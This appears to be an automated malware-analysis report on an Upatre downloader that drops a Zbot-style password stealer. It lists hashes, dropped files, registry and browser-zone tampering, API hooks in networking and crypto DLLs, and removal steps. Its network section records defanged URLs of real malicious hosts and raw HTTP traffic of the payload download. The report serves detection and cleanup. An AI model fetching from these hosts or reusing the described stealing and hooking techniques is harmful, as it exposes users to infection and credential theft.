Trojan.GenericKD.1559566 (BitDefender), TrojanDownloader:Win32/Upatre.L (Microsoft), Trojan.Win32.Bublik.bxtq (Kaspersky), Trojan.Win32.Upatre.jr (v) (VIPRE), Trojan.DownLoad3.28161 (DrWeb), Trojan.GenericKD.1559566 (B) (Emsisoft), PWSZbot-FRM (McAfee), Downloader.Upatre (Symantec), Trojan-Downloader.Win32.Upatre (Ikarus), Trojan.GenericKD.1559566 (FSecure), Crypt_s.FLK (AVG), Win32:Trojan-gen (Avast), TROJ_UPATRE.SMBX (TrendMicro), Trojan.GenericKD.1559566 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: bbae13fd3099b40b0704e5b341308c1b
SHA1: a52bb7c4c3709e2ef53bf6c4b10935eaf9892e0f
SHA256: 064ec5e33d499b35487ec1384af567e4b88b5bb1c0b60cd2b9c8b344d786b909
SSDeep: 384:uHdZNg Ml2 0fkkzWUHh1DjHXRrs905INeZCFtejlIko5dN127BFVn2p4lAnZ8Oh:Q3NXvkkRfDjHXRrs9sINeZEtejlIkoL7
Size: 20256 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-05 06:01:14
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
umvaeb.exe:800
%original file name%.exe:160
nomes.exe:392
realupdater.exe:1932
The Trojan-PSW injects its code into the following process(es):
Explorer.EXE:1680
File activity
The process umvaeb.exe:800 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user% (28672 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (17920 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (73728 bytes)
The process %original file name%.exe:160 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\realupdater.exe (20336 bytes)
The process nomes.exe:392 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Xyefq\umvaeb.exe (693248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SWPB639.bat (173 bytes)
%Documents and Settings%\%current user%\Application Data\Xyefq (4096 bytes)
The process realupdater.exe:1932 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nomes.exe (607232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\pdf[1].enc (289558 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\desktop.ini (67 bytes)
Registry activity
The process umvaeb.exe:800 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 6A 3C F9 EE C9 86 33 8A F3 3B 47 09 E6 27 21"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Xyfoleoknam]
"eaijg70" = "CF 79 D5 92 0E 68 7E 28 48 B5 12 54 EC 9C EA 44"
The process %original file name%.exe:160 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 7B 3C 0D F0 E5 BF 68 20 D9 1A E4 E2 6B 49 29"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\ÃÂâ€Âþúуüõýты"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\àðñþчøù ÑÂÂтþû"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"realupdater.exe" = "realupdater"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\àðñþчøù ÑÂÂтþû"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\ÃÂœþø ôþúуüõýты"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process nomes.exe:392 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 34 EC E9 9D 67 E6 26 33 76 8A 35 7A 55 CC DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process realupdater.exe:1932 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\ÃÂâ€Âþúуüõýты"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\ÃÂœþø ôþúуüõýты"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\àðñþчøù ÑÂÂтþû"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\àðñþчøù ÑÂÂтþû"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nomes.exe" = "nomes"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 0C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 22 D4 A1 44 23 CD C6 0B 67 6E 20 61 F5 1F 24"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| bd18016f5cfa5694720ca629ceb148a0 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Xyefq\umvaeb.exe |
| 8a3d521f5dc2f89eb204e9d62b4f67fc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\realupdater.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan-PSW installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan-PSW installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan-PSW installs the following user-mode hooks in Secur32.dll:
DecryptMessage
SealMessage
DeleteSecurityContext
The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan-PSW installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
umvaeb.exe:800
%original file name%.exe:160
nomes.exe:392
realupdater.exe:1932 - Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%Documents and Settings%\%current user% (28672 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (17920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\realupdater.exe (20336 bytes)
%Documents and Settings%\%current user%\Application Data\Xyefq\umvaeb.exe (693248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SWPB639.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nomes.exe (607232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\pdf[1].enc (289558 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\desktop.ini (67 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 5980 | 6144 | 4.29621 | 18a409c9ee27ba7e2f52c8d5827db0fb |
| .rdata | 12288 | 1142 | 1536 | 2.80053 | 9921719d3029dea6a7daef99a3f5619c |
| .data | 16384 | 260 | 512 | 1.74846 | 92ed38dfa29b35d2ea9541f9024b641a |
| .rsrc | 20480 | 10232 | 10240 | 3.98165 | 320a63c0552666c12f361d403bd803b5 |
| .reloc | 32768 | 316 | 512 | 2.01653 | 5d5037fb65f960eefa0bdd3de33a413b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://svsmills.com/images/pdf.enc | 182.18.150.53 |
| hxxp://japanrareearths.com/img/pdf.enc | 182.18.146.98 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /img/pdf.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: japanrareearths.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2014 12:35:43 GMT
Server: Apache
Last-Modified: Thu, 06 Feb 2014 07:36:02 GMT
Accept-Ranges: bytes
Content-Length: 289558
Content-Type: text/plain
ZZP..U8.d.8.>.8.:..p..87>...>.<.'...2.'...8;7".7>.tB..P.M...L._._.8.].V.Q...\...K...>...q...Qo\...5.....n.8.r.:....|l.oo>...5.1.>.8.j.=.U.8...;.]...5.8.=.?.>.X.7... k8.1 ;.8.>.<.....9..o...i..>...?./...].Jo;?`.<.....;...X...M.[.3nu.Cn.q$d .....>.8.>.8.......<...I..G8.,.8.^...>Ex.>.X.\.8.^...^...>yX...O%.okY^...>.X.....>A....8%..8.^.n.>wX..gX.H.8.^.`.>E~.>.X...8.^...^.2.>.X.0.>...[.d.8.R.X.B.8.^...>[m.>-X.z.8U^...^...>...7.8.k.8.^.`.>.X.H.X.@.8.^...>Am.>QX...8W^...^...>...,.8.k.8.^...>.X.`.X.N.8.^...>Om.>]X...6.^.$"^.6....a^...>E..>QX...8/^...^.N.>?..?...?.E...i.h.8.0.M.>.-.n.x...n.?.d.?....d....N..K..i.Po).8..... .).>j..>.{.....3.x.^.ms=>....0.~.g.ed(jc,..>dl.>......G....5d.I?.8...9..-0.>.;.1X:...^O4..p1X...&3...;G=/:.<.......:m=n;.....'../X....O9k..J.....79?.?.='.../4...?.>l....<..h....8..VA...........4.*.......k.x.j.(.J.8.>...6.......q...2d8.:.......z. N..0.,.x.R.$.R.8a>.....;."....d..*,.........j>..B=6.G.m./>..............G>.<...>..<..>'.....o:....'.v.-.......lT.~.9..../9.<.?o....g.:.<.?.f...8.m.e.o.c.. (...8..3..........6n...Vn....?n.-....p6fE.^....b8.....1X......>.\......dx.o.x.L.......>duc.&M...v.1X9...(... ..%3.N.:..o:.<...>.....m.4....d..s.8d...Y..M.8dn.....6.."..P.. (Yn._.8d.p.8.?..X...8.I.....:.V7....n....]....N..O.....2....8.h.....j....../......?.,.v...s.....i.:..m<.79<l8O<l..1j../.u.?.9.......7...9.7..
<<
<<< skipped >>>
GET /images/pdf.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: svsmills.com
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Date: Tue, 11 Mar 2014 12:35:46 GMT
Server: Apache
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /images/pdf.enc was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...
Map
Strings from Dumps
Explorer.EXE_1680_rwx_01EC0000_00048000:
.text
.text
`.data
`.data
.idata
.idata
@.reloc
@.reloc
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
>$>,>4><>
>$>,>4><>
0123456789
0123456789
http://www.google.com/
http://www.google.com/
http://www.bing.com/
http://www.bing.com/
REPORT
REPORT
HTTP/1.1
HTTP/1.1
RegDeleteKeyExW
RegDeleteKeyExW
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
.TJFZAIY]JD^"
.TJFZAIY]JD^"
?:527|:!;8
?:527|:!;8
!1 (##!(
!1 (##!(
Kmv`jn`%fnfnzg,bt3crd~da4
Kmv`jn`%fnfnzg,bt3crd~da4
1&,$=OJ-:&#O-
1&,$=OJ-:&#O-
-.ynp<</pre><pre>'2$4>%|903</pre><pre>: 8? 1 !</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>w%fkN</pre><pre>t.Ht$HHt</pre><pre>L$Â$</pre><pre>m9.td</pre><pre>zcÁ</pre><pre>ntdll.dll</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>USER32.dll</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>RegCreateKeyExW</pre><pre>RegCloseKey</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegFlushKey</pre><pre>RegEnumKeyExW</pre><pre>ADVAPI32.dll</pre><pre>UrlUnescapeA</pre><pre>PathIsURLW</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>GDI32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>msvcrt.dll</pre><pre>9 9$9(9,9094989</pre><pre>> >$>(>,>0>4>|></pre><pre>00D0K0_0q0z0</pre><pre>:!:(:,:1:8:^:</pre><pre>\StringFileInfo\xx\%s</pre><pre>urlmon.dll</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>kernel32.dll</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>shell32.dll</pre><pre>cabinet.dll</pre><pre>Wadvapi32.dll</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>%Documents and Settings%\%current user%\Application Data</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{6D2DABD3-6C4A-40B1-99CD-5691B9DB7583}</pre>